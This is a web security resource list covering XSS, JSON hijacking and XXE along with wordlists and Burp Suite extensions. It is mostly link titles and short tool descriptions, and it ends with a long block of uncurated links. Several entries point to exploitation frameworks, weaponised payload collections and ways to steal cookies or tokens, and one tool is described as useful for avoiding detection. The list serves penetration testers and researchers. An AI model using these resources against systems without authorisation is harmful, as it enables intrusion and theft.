- Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. In browsers Mutation event occur when there is a change in the DOM Structure of the browsers. There are various ways in which DOM structure could be changed among which innerHTML property is discussed specifically. mXSS is a new class of XSS vectors, the class of mutation-based XSS (mXSS) vectors, which may occur in innerHTML andrelated properties. mXSS affects all three major browserfamilies: IE, Firefox, and Chrome.mXSS could be placed in major browser families and effecting major web applications. In this paper we apply the idea of mutation-based testing technique to generate adequate test data sets for testing XSSVs. Our work addresses XSSVs related to web-applications that use PHP and JavaScript code to generate dynamic HTML contents. Finally there would be the development of an automatic tool which would generate mutants automatically, automatically testing the web application and finally giving the output.
- mXSS attacks: Attacking well-secured web-applications by using innerHTML mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius(2013)
- Persistent XSS
- 101
- Articles/Blogposts/Writeups
- General
- Blind
- File-Based
- Talks/Presentations/Videos
- Papers
- Reflected XSS
- 101
- Articles/Blogposts/Writeups
- Reflected XSS at Philips.com - Jonathan Bouman
- How I XSS’ed Uber and Bypassed CSP - Efkan(2018)
- admin.google.com Reflected Cross-Site Scripting (XSS) - Brett Buerhaus(2015)
- From Reflected XSS to Account Takeover — Showing XSS Impact - A Bug'z Life(2019)
- Reflected DOM XSS and CLICKJACKING on https://silvergoldbull.de/bt.html - Daniel Maksimovic(2018)
- Talks/Presentations/Videos
- Papers
- DOM-based
- JS Framework-Specific
- Angular
- React.js
- JSON Hijacking
- 101
- JSON Hijacking Demystified - Rohini Sulatycki(2012)
- Reflected XSS via JSON executed with Burp, but how to do it in realistic conditions? - StackOverflow
- XSS : Content-type: application/json - StackOverflow
- Is it possible to XSS exploit JSON responses with proper JavaScript string escaping - StackOverflow
- Articles/Blogposts/Writeups
- Story of a JSON XSS - Nikhil Mittal(2017)
- JSON hijacking for the modern web - Gareth Heyes(2020)
- Exploiting JSON Framework : 7 Attack Shots - Aditya K. Sood
- Attacking JSON Application : Pentesting JSON Application - Narendra Bhati(2018)
- Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus
- JSON based XSS - Koumudi Garikipati(2020)
- XSSing Google Code-in thanks to improperly escaped JSON data - Thomas Orlita
- 101
- Testing
- XSS Test String Dump
- HTML Purifier XSS Attacks Smoketest
- Cross-site scripting (XSS) cheat sheet - PortSwigger
- This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector. This cheat sheet is regularly updated in 2019. Last updated: Fri, 08 Nov 2019
- Training
- XSS-Game.appspot
- Firing-Range
- Firing Range is a test bed for web application security scanners, providing synthetic, wide coverage for an array of vulnerabilities.
- XSSer
- prompt.ml - XSS Injection Game
- alert1 to win - XSS Injection Game
- Tools
- xsscrapy
- XSS Sniper
- Xenotix
- OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework.
- xssValidator
- This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.
- Shuriken
- Cross-Site Scripting (XSS) command line tool for testing lists of XSS payloads on web apps.
- XSStrike
- XSStrike is an advanced XSS detection and exploitation suite.
- iframeBusterXSS
- Check for know iframeBuster XSS
- XSS tag_event analyzer
- Script to test suitable XSS payloads when tag/events are validated in a weak way.
- Security Headers(scanner)
- Writeups
- Writing an XSS Worm
- XSS without HTML: Client-Side Template Injection with AngularJS
- XSS in AngularJS video series (walkthrough) - explaining some AngularJS sandbox bypasses, which resulted in the removal of the sandbox in 1.6
- Chaining Cache Poisoning To Stored XSS - Rohan Aggarwal
- Stealing JWTs in localStorage via XSS -David Roccasalva
- Penetration testing & window.opener — XSS vectors part 1 - Josh Graham
- A Questionable Journey From XSS to RCE - Dominik Penner
- Firefox uXSS and CSS XSS - leucosite.com
- Referer XSS with a Side of Link Injection - doyler.net
- XSS in steam react chat client - Zemmez
- [Cerberus FTP Blind Cross-Site Scripting to remote code execution as SYSTEM. (Version 9 and 10) - Kevin(secu.dk)]
- Winning Intigriti's XSS Challenge - Ryan Wise
- iOS Bug Hunting – Web View XSS - Allyson O'Malley
- XSS in GMail’s AMP4Email via DOM Clobbering - Michal Bentkowski
- Auditing a Payment Processing of a Booking Framework - Jorge Lajara(2018)
- This article is thanks to the collaboration with Rayco Betancor and his crazy ideas and deep knowledge of how a Payment processing works, and a lot of trying different requests, forcing errors and trying harder.
- Sarahah XSS Exploitation Tool - Compromising Sarahah Users. - Shawar Khan
- A Questionable Journey From XSS to RCE - Dominik Penner(2019)
- Documenting the impossible: Unexploitable XSS labs - Gareth Heyes
- Art of bug bounty: a way from JS file analysis to XSS - Jakub Żoczek(2020)
- XSS a Paste Service - Pasteurize (web) Google CTF 2020 - LiveOVerflow(2020)
- URL validation bypass | Filedescriptor solves Intigriti's XSS challenge - Reconless(2020)
- Payloads
- Cross Site Scripting (XSS) Vulnerability Payload List
- Stealing HttpOnly Cookie via XSS - Yasser Gersy(2018)
- Tiny-XSS-Payloads
- A collection of tiny XSS Payloads that can be used in different contexts.
- 101
- [XML Schema, DTD, and Entity Attacks A Compendium of Known Techniques - Timothy D. Morgan, Omar Al Ibrahim]
- XML Schema, DTD, and Entity Attacks: A Compendium of Known Techniques - Timothy D. Morgan, Omar Al Ibrahim(2014)
- DOS
- Articles/Papers/Talks/Writeups
- XXE Attack
- 101
- Articles/Papers/Talks/Writeups
- Hunting in the Dark - Blind XXE
- Exploiting Out Of Band XXE using internal network and php wrappers - Mahmoud Gamal
- Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari
- XXE: How to become a Jedi - Yaroslav Babin(Zeronights 2017)
- Advice From A Researcher: Hunting XXE For Fun and Profit
- Leading the Blind to Light! - A Chain to RCE
- Generic XXE Detection - Christian Schneider
- Playing with Content-Type – XXE on JSON Endpoints - NETSPI
- XXE OOB exploitation at Java 1.7+ - 2014
- Security of applications that parse XML (supplementary) - 2009
- Exploiting XXE In File Upload Functionality
- XML Parser Evaluation - web-in-security.blogspot.de
- Hiding in Plain Sight: XXE Vulnerability in HP Project & Portfolio Mgmt Center - Benjamin Caudill
- Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, … - thezero
- Playing with Content-Type – XXE on JSON Endpoints(2015) - Antti Rantasaari
- Talks/Presentations/Videos
- Black Hat EU 2013 - XML Out-of-Band Data Retrieval
- What You Didn't Know About XML External Entities Attacks - Timothy D. Morgan
- Exploiting XXE Vulnerabilities In File Parsing Functionality - Willis Vandevanter - BHUSA 2015
- In this 25-minute briefing, we will discuss techniques for exploiting XXE vulnerabilities in File Parsing/Upload functionality. Specifically, XML Entity Attacks are well known, but their exploitation inside XML supported file formats such as docx, xlsx, pptx, and others are not. Discussing the technically relevant points step by step, we will use real world examples from products and recent bug bounties. Finally, in our experience, creating 'XXE backdoored' files can be a very slow process. We will introduce our battle tested tool for infecting the file formats discussed.
- FileCry - The New Age of XXE - BH USA 2015
- Papers
- CVEs
- Reference
- Tools
- XXEinjector
- XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications
- oxml_xxe
- This tool is meant to help test XXE vulnerabilities in file formats.
- XXEinjector
- Miscellaneous
- Wordlists
- Lists
- jhaddix all.txt
- all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
- jhaddix content_discovery_all.txt
- a masterlist of content discovery URLs and files (used most commonly with gobuster)
- SecLists
- SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
- IntruderPayloads
- A collection of Burpsuite Intruder payloads, BurpBounty payloads (https://github.com/wagiro/BurpBounty), fuzz lists and pentesting methodologies.
- CommonSpeak2
- CWFF - Custom wordlists for fuzzing
- CWFF is a tool that creates a special High quality fuzzing/content discovery wordlist for you at the highest speed possible using concurrency and it's heavily inspired by @tomnomnom's Who, What, Where, When, Wordlist
- 1ndiList v 1.0
- Recon Custom WordList Ganerator
- Who, What, Where, When, Wordlist - TomNomNom
- OneListForAll
- Rockyou for web fuzzing
- Samlists
- "Free, libre, effective, and data-driven wordlists for all!"
- Payloads
- "Payload Arsenal for Pentration Tester and Bug Bounty Hunters"
- webapp-wordlists
- This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.
- RFI/LFI Payload List
- all.txt - jhaddix
- "all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/"
- sql-injection-payload-list
- xxe-injection-payload-list
- Big List of Naughty Strings
- The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.
- subdirectories-discover
- "Perfect wordlist to discover directories and files on target site with tools like ffuf."
- wordlists - assetnote
- Automated & Manual Wordlists provided by Assetnote
- n0kovo subdomain wordlist
- A subdomain wordlist of 3,000,000 lines, crafted by harvesting SSL certs from the entire IPv4 space.
- jhaddix all.txt
- Creation of
- Assetnote Wordlists
- "This website provides you with wordlists that are up to date and effective against the most popular technologies on the internet. Wordlists are generated on the 28th of each month, using Commonspeak2 and GitHub Actions. If there's an extension or technology that you would like a wordlist for, but it's not in the table below, send us a PR and it will be included on this page after the next run."
- Who, What, Where, When, Wordlist - @TomNomNom(NahamCon2020)
- Assetnote Wordlists
- Lists
- Payload Lists
- Tutorials/Tips/Stuff
- 101
- Issue Definitions
- This listing contains the definitions of all issues that can be detected by Burp Scanner.
- Burp Suite Training - PortSwigger
- Issue Definitions
- Articles/Blogposts/Writeups
- Various Burp Resources - agarri.fr
- Burp Pro : Real-life tips and tricks
- Behind enemy lines: Bug hunting with Burp Infiltrator
- Automating Web Apps Input fuzzing via Burp Macros
- Intro to Web App Security Testing: Logging - Aaron James(2020
- "The Logger++ extension is a great tool for recording requests and responses across all of Burp Suite. However, it is important to ensure enough log entries are retained from the tools you expect and that logs are exported if you want to keep them (my preference is automatic export to CSV)."
- SSH "accept : too many open files" on OS X when using Burp - dewhurstsecurity.com(2013)
- Burp Suite Visual Aids - lanmaster53(2015)
- Brute Forcing with Burp - Pentesters Tips & Tricks Week 1 - securenetwork.com(2017)
- How to Burp Good - n00py(2017)
- Towards a Quieter Firefox - Brian King(2017)
- Quality of Life Tips and Tricks - Burp Suite - Parsia(2019)
- Using Burp’s session Handling Rules to insert authorization cookies into Intruder, Repeater and even sqlmap - NVISO(2019)
- Detecting and annoying Burp users - Julien Voisin(2021)
- Burp Automation | Automating Burp Scanning Via Rest API & Robot Framework Using Python3 - Divyanshu(2021)
- Proxy managed by enterprise? No problem! Abusing PAC and the registry to get burpin’ - Thomas Grimee(2021)
- Burp Suite: Match And Replace - thexssrat(2021)
- PimpMyBurp #1 – PwnFox + Autorize: The perfect combo to find IDOR - @adrien_jeanneau(2021)
- Automating Authorization Testing: AuthMatrix: Part 1 - Tib3rius(2021)
- Talks/Presentations/Videos
- OWASP Top 10: Hacking Web Applications with Burp Suite - Chad Furman
- Tactical Burp Suite: Next steps webcast - SecureIdeas(2020)
- Secure Ideas' Tactical Burp: Next Steps is a two-hour video exploring topics related to Burp Suite and its use in a web application penetration test. This course explores the various features of Burp Suite, focusing on how we use the system during our penetration testing.
- Burp Macro Auto Authentication - CyberSecurityTV(2020)
- Burp session handling rules are very powerful. In this episode, we have seen an example of how to configure burp to auto login or activate session after it detects session invalidity.
- 101
- Plugins
- Creating
- Adapting Burp Extensions for Tailored Pentesting
- Developing Burp Suite Extensions - DOYENSEC
- Material for the training "Developing Burp Suite Extensions – From Manual Testing to Security Automation"
- Developing and Debugging Java Burp Extensions with Visual Studio Code - Parsia(2019)
- Burp Extension Generator
- Everything you need about Burp Extension Generation
- Burp Suite Extension Development - Ismail Tasdelen(2022)
- API
- burp-rest-api
- A REST/JSON API to the Burp Suite security tool. Upon successfully building the project, an executable JAR file is created with the Burp Suite Professional JAR bundled in it. When the JAR is launched, it provides a REST/JSON endpoint to access the Scanner, Spider, Proxy and other features of the Burp Suite Professional security tool.
- burp-rest-api
- AuthN/AuthZ-related
- AuthMatrix
- AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services.
- Autorize
- Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert, and Federico Dotta, a security expert at Mediaservice.net. Autorize was designed to help security testers by performing automatic authorization tests. With the last release now Autorize also perform automatic authentication tests.
- Escalating Privileges like a Pro - Gaurav Narwani
- AutoRepeater
- Burp Suite is an intercepting HTTP Proxy, and it is the defacto tool for performing web application security testing. While Burp Suite is a very useful tool, using it to perform authorization testing is often a tedious effort involving a "change request and resend" loop, which can miss vulnerabilities and slow down testing. AutoRepeater, an open source Burp Suite extension, was developed to alleviate this effort. AutoRepeater automates and streamlines web application authorization testing, and provides security researchers with an easy-to-use tool for automatically duplicating, modifying, and resending requests within Burp Suite while quickly evaluating the differences in responses.
- Uniqueness plugin for Burp Suite
- Makes requests unique based on regular expressions. Handy for registration forms and any other endpoint that requires unique values upon every request.
- AuthMatrix
- Code Scanning
- Collaborator-related
- Running Your Instance of Burp Collaborator Server - blog.fabiopires.pt
- collaborator-everywhere
- A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp Collaborator
- Diagramming
- PESD Exporter
- Generate security-oriented sequence diagrams and fine-grained parsed traffic from Burp Suite Proxy history.
- PESD Exporter
- Extra-Checks/Scanners
- backslash-powered-scanner
- This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
- HUNT
- HUNT is a Burp Suite extension to: 1. Identify common parameters vulnerable to certain vulnerability classes; 2. Organize testing methodologies inside of Burp Suite;
- Burp-molly-pack
- Burp-molly-pack is Yandex security checks pack for Burp. The main goal of Burp-molly-pack is to extend Burp checks. Plugins contains Active and Passive security checks.
- burp-suite-error-message-checks
- Burp Suite extension to passively scan for applications revealing server error messages
- Asset Discover
- Burp Suite extension to discover assets from HTTP response using passive scanning.
- Blogpost
- Dr. Watson
- Dr. Watson is a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information! It's your very own discovery side kick, the Dr. Watson to your Sherlock!
- LinkDumper Burp Plugin
- Extract (links/possible endpoints) from responses & filter them via decoding/sorting
- BurpExtenderHeaderChecks
- SQLTruncScanner
- Messy BurpSuite plugin for SQL Truncation vulnerabilities.
- Asset_Discover
- Burp Suite extension to discover assets from HTTP response using passive scanning.
- backslash-powered-scanner
- Extended-Functionality
- burp-highlighter
- Exporter Extension for Burp Suite
- Exporter is a Burp Suite extension to copy a request to the clipboard as multiple programming languages functions.
- Stepper
- Stepper is designed to be a natural evolution of Burp Suite's Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
- BurpSuiteSharpener
- "This extension should add a number of UI and functional features to Burp Suite to make working with it easier."
- Piper
- Unix-style approach to web application testing - Andras Veres-Szentkiralyi(2020)
- Web application testers of our time have lots of tools at their disposal. Some of these offer the option to be extended in ways the original developers did not think of, thus making their tool more useful. However, developing extensions or plugins have entry barriers in the form of fixed costs, boilerplate, et cetera. At the same time, many problems already have a solution designed as a smaller standalone program, which could be combined in the Unix fashion to produce a useful complex tool quickly and easily. In this paper, a (meta)solution is introduced for this integration problem by lowering the entry barriers and offer several examples that demonstrate how it saved time in web application assessments.
- Unix-style approach to web application testing - Andras Veres-Szentkiralyi(2020)
- burp-copy-as-ffuf
- Burp Extension that copies a request and builds a FFUF skeleton
- Burp Bounty
- "Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that allows you, in a quick and simple way, to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface."
- Autowasp
- a Burp Suite extension that integrates Burp issues logging, with OWASP Web Security Testing Guide (WSTG), to provide a streamlined web security testing flow
- burpa
- Burp Automator - A Burp Suite Automation Tool. It provides a high level CLI and Python interfaces to Burp Suite scanner and can be used to setup Dynamic Application Security Testing (DAST).
- File Upload
- UploadScanner Burp extension
- A Burp Suite Pro extension to do security tests for HTTP file uploads.
- UploadScanner Burp extension
- Forced-Browsing/File Discovery
- BurpSmartBuster
- Looks for files, directories and file extensions based on current requests received by Burp Suite
- BurpSmartBuster
- J2EE
- J2EEScan
- J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications.
- J2EEScan
- JavaScript
- BitMapper
- Burp-suite Extension For finding .map files
- BitMapper
- JSONP
- jsonp
- jsonp is a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies.
- jsonp
- JWTs
- JWT4B
- JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
- jwt-heartbreaker
- The Burp extension to check JWT (JSON Web Tokens) for using keys from known from public sources
- Blogpost
- JWT4B
- Protobufs
- burp-protobuf-decoder
- A simple Google Protobuf Decoder for Burp
- Blackbox Protobuf
- Blackbox protobuf is a Burp Suite extension for decoding and modifying arbitrary protobuf messages without the protobuf type definition.
- burp-protobuf-decoder
- Proxy
- NoPE Proxy
- Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite.
- NoPE Proxy
- Postman
- Postman-Integration
- Postman Integration is an extension for burp to generate Postman collection fomat json file.
- Postman-Integration
- Repeater
- RepeaterSearch
- "This extension adds a search bar to the Repeater tab that can be used to highlight all repeater tabs where the request and/or response matches a query via simple text matching or Regex."
- Bookmarks
- "A Burp Suite extension to bookmark requests for later, instead of those 100 unnamed repeater tabs you've got open."
- RepeaterSearch
- SAML
- SAML Raider
- SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates.
- SAML Raider
- Serialization
- Freddy the Serial(isation) Killer - Deserialization Bug Finder
- A Burp Suite extension to aid in detecting and exploiting serialisation libraries/APIs.
- Freddy the Serial(isation) Killer - Deserialization Bug Finder
- Single-Page-Apps
- BurpKit
- BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional Script bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.
- BurpKit
- Sitemap
- PwnBack
- Burp Extender plugin that generates a sitemap of a website using Wayback Machine
- PwnBack
- SQL Injection
- sqlipy
- SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.
- SQLi Query Tampering
- SQLi Query Tampering extends and adds custom Payload Generator/Processor in Burp Suite's Intruder. This extension gives you the flexibility of manual testing with many powerful evasion techniques.
- sqlipy
- Swagger
- swurg
- Parses Swagger files into the BurpSuite for automating RESTful API testing – approved by Burp for inclusion in their official BApp Store.
- swurg
- TLS
- Awesome TLS
- Fix Burp Suite's horrible TLS stack & spoof any browser fingerprint
- Awesome TLS
- Turbo Intruder
- Haptyc
- "Haptyc is a python library which was built to add payload position support and Sniper/Clusterbomb/Batteringram/Pitchfork attack types into Turbo Intruder. While Haptyc accomplishes these goals fairly well it also introduces a simpler way to express test sequences in general. While this library was meant to target Turbo Intruder it has no hard dependencies on Turbo Intruder and can be used anywhere one requires test generation in a Python context. Unfortunately at this time since Haptyc was built for a jython interpreter it only supports Python 2.7 (however future changes will fix this)."
- Haptyc
- WAFs
- HTTPSmuggler
- A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques. This extension has been developed by Soroush Dalili (@irsdl) from NCC Group.
- HTTPSmuggler
- Wordlists
- Golden Nuggets
- Burp Suite Extension to easily create Wordlists based off URI, URI Parameters and Single Words (Minus the Domain)
- whey-cewler.py
- "Whey CeWLer runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist."
- Golden Nuggets
- XSS
- reflector
- Burp Suite extension is able to find reflected XSS on page in real-time while browsing on web-site
- reflector
- Other
- C02
- Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
- distribute-damage
- Designed to make Burp evenly distribute load across multiple scanner targets, this extension introduces a per-host throttle, and a context menu to trigger scans from. It may also come in useful for avoiding detection.
- Office Open XML Editor - burp extension
- Bumpster
- The Unofficial Burp Extension for DNSDumpster.com. You simply supply a domain name and it returns a ton of DNS information and basically lays out the external network topology.
- ParrotNG - burp plugin
- Brida
- Brida is a Burp Suite Extension that, working as a bridge between Burp Suite and Frida, lets you use and manipulate applications’ own methods while tampering the traffic exchanged between the applications and their back-end services/servers. It supports all platforms supported by Frida (Windows, macOS, Linux, iOS, Android, and QNX)
- Cyber Security Transformation Chef
- The Cyber Security Transformation Chef (CSTC) is a Burp Suite extension. It is build for security experts to extend Burp Suite for chaining simple operations for each incomming or outgoing message. It can also be used to quickly make a special custom formatting for the message.
- Hackbar
- Hackbar plugin for Burp
- progress-burp
- Burp Suite extension to track vulnerability assessment progress
- C02
- Creating
- Burp Macros
- 101
- Articles/Blogposts/Writeups
- Tools
- CloudFlair
- CloudFlair is a tool to find origin servers of websites protected by CloudFlare who are publicly exposed and don't restrict network access to the CloudFlare IP ranges as they should. The tool uses Internet-wide scan data from Censys to find exposed IPv4 hosts presenting an SSL certificate associated with the target's domain name.
- CloudFire
- This project focuses on discovering potential IP's leaking from behind cloud-proxied services, e.g. Cloudflare. Although there are many ways to tackle this task, we are focusing right now on CrimeFlare database lookups, search engine scraping and other enumeration techniques.
- CloudFlair
- HackerOne H1-212 Capture the Flag Solution - Corben Douglas
- ebay.com: RCE using CCS
- $10k host header - eze2307
- REMOTE CODE EXECUTION! Recon Wins - vishnuraj
- Analyzing a Creative Attack Chain Used To Compromise A Web Application
- RCE in Hubspot with EL injection in HubL - betterhacker.com
- "This is the story of how I was able to get remote code execution on Hubspot's servers by exploiting a vulnerability in HubL expression language, which is used for creating templates and custom modules within the Hubspot CRM."
- Hacking Slack using postMessage and WebSocket-reconnect to steal your precious token - labs.detectify
- Tools
- Boucan: A Bug Bounty Canary Platform
- This project is an attempt to implement a lightweight burp collaborator-esc application and consists of two main components: a DNS Server (Custom Python Implemention with dnslib) and an API. It is still very much in the early days of development. You can think of Boucan as sort of a Canary that will notify you when an external asset (DNS Record, HTTP Server, SMTP Server) has been interacted with. This is useful for blind payload injection.
- Keyhacks
- Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
- Boucan: A Bug Bounty Canary Platform
ToDo links
XSS
https://github.com/EgeBalci/xss-flare
https://medium.com/@spade.com/a-guide-to-make-your-own-serverless-blind-xss-and-blind-oob-payload-18f8f2b9c507
https://ysamm.com/?p=493
https://netsec.expert/posts/xss-in-2021/
https://0xmkr24.medium.com/cross-site-scripting-contexts-walkthrough-portswigger-labs-part-1-aad6cf65e49b
https://securitygoat.medium.com/data-exfiltration-with-some-fun-xss-tricks-49e9251f05fd
https://portswigger.net/research/portable-data-exfiltration
https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/
https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/
https://github.com/heroanswer/XSS_Cheat_Sheet_2020_Edition
https://liveoverflow.com/do-not-use-alert-1-in-xss/
https://blog.mozilla.org/attack-and-defense/2021/11/03/finding-and-fixing-dom-based-xss-with-static-analysis/
https://hacklido.com/blog/252-xss-filter-evasion-and-waf-bypassing
https://whynotsecurity.com/blog/xss-to-rce/
https://www.youtube.com/embed/xxKAvx4UeUg
https://www.volkis.com.au/blog/bypass-xss-in-wafs/
https://www.youtube.com/watch?v=mKAWpFdVcPY
https://docs.google.com/presentation/d/130n98LMDyD1xyZp5wzgmjmrZPP-nBcU9tI3NaOVfBs0/preview#slide=id.p
https://github.com/redcode-labs/poXSSon
https://www.youtube.com/watch?v=HU3np5xvioA
https://github.com/kleiton0x00/ppmap
https://www.blackhat.com/presentations/bh-europe-07/Dube-Rios/Whitepaper/bh-eu-07-rios-WP.pdf
https://pentestit.medium.com/hey-dude-do-you-need-script-on-your-page-d9192df990f4
https://twitter.com/orange_8361/status/1333458585980813333
https://www.trustedsec.com/events/webinar-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit/
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/
https://dev.to/caffiendkitten/xss-javascript-polyglots-4i64
https://bishopfox.com/blog/lexss-bypassing-lexical-parsing-security-controls
https://lutfumertceylan.com.tr/posts/acc-takeover-web-cache-xss/
https://medium.com/bugbountywriteup/content-security-policy-bypass-to-perform-xss-3c8dd0d40c2e
https://knoxss.me/?page_id=766
https://www.youtube.com/watch?v=TgilzlNHFz8
https://github.com/hakluke/weaponised-XSS-payloads
https://twitter.com/intigriti/status/1356245100414840833
https://github.com/yavolo/eventlistener-xss-recon
https://medium.com/@know.0nix/hunting-good-bugs-with-only-html-d8fd40d17b38
https://leucosite.com/Edge-Chromium-EoP-RCE/
https://github.com/hahwul/dalfox
https://www.immersivelabs.com/resources/blog/wagtail-xss-localstorage-account-hijack/
https://portswigger.net/research/redefining-impossible-xss-without-arbitrary-javascript
https://r2c.dev/blog/2021/xss-cheat-sheets/
https://thehackerblog.com/video-download-uxss-exploit-detailed/
https://medium.com/realmodelabs/kindledrip-from-your-kindles-email-address-to-using-your-credit-card-bb93dbfb2a08
https://blog.s1r1us.ninja/bug-bounty/cookie-tossing-to-rce-on-google-cloud-jupyter-notebooks
https://medium.com/bugbountywriteup/intigritis-december-xss-challenge-2020-unintended-solution-8205b4a4b95b
https://chefsecure.com/courses/xss/recipes/polyglots-the-ultimate-xss-payloads
https://medium.com/cyberverse/obfuscated-polyglot-xss-payloads-simplified-with-references-157e95b1d601
https://security.szurek.pl/en/xss-polyglot.html
https://easterxss.terjanq.me/writeup.html
https://www.youtube.com/watch?utm_campaign=bug_bytes_99_bypassing_bots_and_wafs_jq_in_burp_smarter_json_fuzzing_and_subdomain_takeovers
* [AwesomeXSS - Somdev Sangwan](https://github.com/s0md3v/AwesomeXSS)
* Awesome XSS stuff
Cookies
https://medium.com/@agrawalsmart7/cookie-based-injection-xss-making-exploitable-with-out-exploiting-other-vulns-81132ca01d67
https://security.stackexchange.com/questions/36172/is-cookie-based-xss-exploitable
https://wesecureapp.com/2017/07/10/xss-by-tossing-cookies/
http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/
https://appsecnotes.blogspot.com/2009/11/xss-via-cookie-how-severe.html
http://blog.k3170makan.com/2013/10/aboutme-cookie-based-xss.html
https://blog.jeremiahgrossman.com/2010/02/converting-unimplementable-cookie-based.html
DOM
https://enfinlay.github.io//xss/dom/burp/2021/02/23/dom-xss-is-dead.html
https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f
https://github.com/nccgroup/tracy
https://static.sched.com/hosted_files/njsi2019/31/Securing%20the%20DOM%20from%20the%20bottom%20up%20-%20Node%2BJS%20Interactive.pdf
https://www.youtube.com/watch?v=QBkLI35sxVsutm_campaign=bug_bytes_103_cookie_tossing_recon_tools_benchmarks_stealing_google_docs_with_screenshots&utm_term=2020-12-30
https://research.securitum.com/helping-secure-dompurify-part-1/
https://github.com/filedescriptor/untrusted-types
https://thexssrat.medium.com/digging-deep-into-dom-xss-9ed172876477
* [Restricted-character XSS for fun - physuru.dev(2021)](https://web.archive.org/web/20210414031135/https://physuru.dev/blog/restricted_character_xss/)
https://blog.mozilla.org/attack-and-defense/2021/11/03/finding-and-fixing-dom-based-xss-with-static-analysis/
https://portswigger.net/web-security/dom-based/cookie-manipulation
https://owasp.org/www-community/attacks/DOM_Based_XSS
https://portswigger.net/blog/introducing-dom-invader
https://medium.com/@shilpybanerjee/dom-based-cookie-manipulation-portswigger-lab-16ae86de26fc
https://medium.com/bugbountywriteup/reflected-xss-on-microsoft-com-via-angular-template-injection-2e26d80a7fd8
https://medium.com/@lucideus/a-definitive-guide-to-session-hijacking-lucideus-research-71165a672973
https://security.stackexchange.com/questions/176897/how-to-exploit-dom-xss-in-cookies-without-having-xss-on-the-page/176938
https://github.com/wisec/domxsswiki
https://hackerone.com/reports/57356
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-xss
https://github.com/wisec/domxsswiki
Talks
* [Tracing User Input Through JavaScript is for Tools - Jake Heath, Michael Roberts(2018)](https://www.youtube.com/watch?v=3zowuWLEGsA&list=PL7D3STHEa66TbZwq9w3S2qWzoJeNo3YYN&index=21)
